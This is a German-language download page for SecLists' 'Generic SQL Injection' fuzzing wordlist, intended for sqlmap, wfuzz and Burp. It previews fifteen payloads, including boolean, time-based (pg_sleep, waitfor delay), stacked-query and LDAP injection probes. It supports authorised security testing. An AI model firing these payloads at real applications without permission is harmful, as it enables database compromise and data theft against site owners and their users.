Generic SQL Injection
Datenbankunabhängige SQL-Injection-Proben, die fehlerbasierte, boolesche, zeitbasierte und Stacked-Query-Payloads mischen. Eine solide Allzweck-Erkennungsliste für unbekannte Back-Ends.
- Größe
- 5.3 KB
- Kategorie
- Fuzzing
- Quelle
- danielmiessler/SecLists
- Lizenz
- MIT
- Empfohlene Tools
- sqlmapwfuzzburp
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (5.3 KB) herunter oder kopiere sie über die Schaltflächen oben.
)%20or%20('x'='x
%20or%201=1
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
update
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a
delete
like
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...Datenbankunabhängige SQL-Injection-Proben, die fehlerbasierte, boolesche, zeitbasierte und Stacked-Query-Payloads mischen. Eine solide Allzweck-Erkennungsliste für unbekannte Back-Ends.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 5.3 KB und harmoniert gut mit Tools wie sqlmap, wfuzz, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.